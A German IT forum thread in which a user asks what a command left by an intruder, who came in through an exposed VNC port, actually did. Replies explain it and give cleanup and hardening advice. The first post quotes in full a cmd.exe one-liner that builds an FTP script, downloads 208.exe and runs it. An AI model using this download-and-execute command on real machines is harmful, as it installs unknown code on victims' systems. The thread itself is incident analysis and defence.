Zum Inhalt springen

Empfohlene Beiträge

Geschrieben

Hallo Leute,

ich habe heute eine knifflige Frage;

ein Arbeitskollege schrieb mich gerade über ICQ an. Er hatte gestern Abend den Port für VNC für ca. 3 Stunden geöffnet und VNC auf sienem Rechner laufen lassen weil er einem Freund etwas zeigen wollte.

In diesen 3 Stunden hat sich wohl jemand in seinen Rechner über diesen Port eingeschleust. Nun hat dieser Hacker einige Befehler ausgeführt welche mein Kollege noch unter ausführen stehen hatte:

cmd.exe /c del i&echo open 127.0.0.1 33093 > i&echo user 1 1 >> i &echo get 208.exe >> i &echo quit >> i &ftp -n -s:i &208.exe&del i&exit

dieser Code stand genau so unter Ausführen drin. Ich mein das meiste verstehen wir aber was genau kann/könnte dieser Befehl ausgeführt haben?

Hat einer von euch sowas schonmal gesehen?

Geschrieben

Das VNC-Protokoll ansich ist ein unverschluesseltes Protokoll.

D.h. ohne geeignete Sicherheitsmassnahmen wie z.B. die Nutzung von SSH (z.B. Openssh) kann das genutzte VNC-Kennwort im Klartext mitgelesen und missbraucht werden.

Auch werden InstantMessenger (wie z.B. ICQ) und Chatprogramme (wie z.B. Mirc) oft als Uebertraeger von Schadsoftware missbraucht. D.h. in diesen Programmen sollten die bereitstehenden Sicherheitsfunktionen auch genutzt werden (z.B. Links und Dateiuebertragungen nur von ausgewaehlten Personen zulassen oder komplett ausschalten).

Ueber die Kommandos:

cmd /c - fuehrt die Eingabeaufforderung mit dem angehaengten Befehl aus

del - loeschen

> Ausgabeumleitung in eine Datei

>> Anhaengen in eine Datei

open - FTP-Befehl zum Oeffnen einer FTP-Verbindung

get - FTP-Befehl zum Download einer Datei

Hier scheint, dass auf dem infizierten PC ein lokaler FTP Server auf Port 33093 installiert wurde.

Massnahmen:

DSL- und Netzwerkverbindungen (und wo vorhanden auch zu ISDN) trennen

Datensicherung

Neuinstallation

sichere Konfiguration:

-- Keine Adminrechte fuer den taeglichen Betrieb

-- Keine ungefragt zugesandten Mails anklicken

-- Nicht alle Links ohne Nachdenken anklicken

-- Regelmaessig Sicherheitsupdates einspielen

-- Aktueller Virenscanner

-- Keine Dienste unnoetig anbieten

-- XPSP2 Firewall bzw. Personal Firewall einsetzen und sinnvoll konfigurieren

Wenn eine Neuinstallation nicht in Frage kommt:

Scannen auf Viren mit einem aktuellen Virenscanner von einem garantiert virenfreien Medium:

- z.B. mit knoppicillin

Scannen auf Schadsoftware/Adware:

- mit HiJackThis

- mit SysInternals AutoRuns

- mit SysInternals ProcessExplorer

- mit SpyBotSD

- mit Ad-aware

Scannen auf RootKits:

- mit HiJackThis

- mit SysInternals AutoStarts

- mit SysInternals ProcessExplorer

- mit SysInternals Rootkit Revealer

- mit F-Secure Blacklight

Allerdings kannst Du mit diesen Massnahmen nie 100%ig sicher sein. Eine Neuinstallation ist immer die technisch sauberste Loesung.

Links zu den einzelnen Programmen siehe Linkliste Securityforum.

Geschrieben

Hi hades,

vielen dnak für diene ausgiebige Antwort (!!!).

Mein Kollege ist schon dabei das System neu auf zu spielen.

Es hat uns nur interessiert was genau da nun abgegangen ist.

Ich denke das war ihm nun eine Lehre mit VNC. Gut das ich RemotelyAnywhere mit Verschlüsselung nutze.

Geschrieben
...

Wenn eine Neuinstallation nicht in Frage kommt:

Scannen auf Viren mit einem aktuellen Virenscanner von einem garantiert virenfreien Medium:

- z.B. mit knoppicillin

Scannen auf Schadsoftware/Adware:

- mit HiJackThis

- mit SysInternals AutoRuns

- mit SysInternals ProcessExplorer

- mit SpyBotSD

- mit Ad-aware

Scannen auf RootKits:

- mit HiJackThis

- mit SysInternals AutoStarts

- mit SysInternals ProcessExplorer

- mit SysInternals Rootkit Revealer

- mit F-Secure Blacklight

.....

[WERBUNG] Hamachi : Stay Connected [/WERBUNG]

stellt sich nur die frage ob n ftp-server als virus erkannt wird?

vielleicht auch mal mit irgendwelchen port-check-programmen schauen was da nun auf dem 33093 horcht oder so...

bigredeyes

Geschrieben

Moin,

dein Freund ist nicht der erste dem das passiert einem Kumpel von mir ist letztens genau das gleiche passiert.

Bei ihm haben sie auch einen FTP zum laufen gebracht.

Ich nutze auch VNC wie oben schon genannt mit Open SSH. Das gibt einem gleich ein viel besseres Gefühl wenn man seinem VNC Server am laufen hat.

Dein Kumpel kann ja ma googlen. Es gibt zig Tutorials für VNC mit SSH. Man muss sich halt ein wenig einlesen.

Viele Grüße

Georg

Dein Kommentar

Du kannst jetzt schreiben und Dich später registrieren. Wenn Du ein Konto hast, melde Dich jetzt an, um unter Deinem Benutzernamen zu schreiben.

Gast
Auf dieses Thema antworten...

×   Du hast formatierten Text eingefügt.   Formatierung wiederherstellen

  Nur 75 Emojis sind erlaubt.

×   Dein Link wurde automatisch eingebettet.   Einbetten rückgängig machen und als Link darstellen

×   Dein vorheriger Inhalt wurde wiederhergestellt.   Editor leeren

×   Du kannst Bilder nicht direkt einfügen. Lade Bilder hoch oder lade sie von einer URL.

Fachinformatiker.de, 2024 by SE Internet Services

fidelogo_small.png

Schicke uns eine Nachricht!

Fachinformatiker.de ist die größte IT-Community
rund um Ausbildung, Job, Weiterbildung für IT-Fachkräfte.

Fachinformatiker.de App

Download on the App Store
Get it on Google Play

Kontakt

Hier werben?
Oder sende eine E-Mail an

Social media u. feeds

Jobboard für Fachinformatiker und IT-Fachkräfte

×
×
  • Neu erstellen...